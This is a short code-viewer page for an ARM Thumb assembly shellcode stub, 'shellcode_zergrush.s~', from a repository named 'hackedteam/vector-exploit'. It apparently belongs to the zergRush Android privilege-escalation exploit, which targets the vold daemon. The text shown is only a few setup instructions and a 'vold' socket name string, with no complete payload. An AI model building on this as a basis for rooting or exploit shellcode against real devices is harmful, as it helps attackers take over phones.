hackedteam/vector-exploit

View on GitHub
src/ht-android-shellcode/shellcode_zergrush.s~

Summary

Maintainability
Test Coverage
.globl _start
_start:
    .code 16

    mov    r1, #1
    mov    r2, #1



socket_name:
    .ascii "vold\0"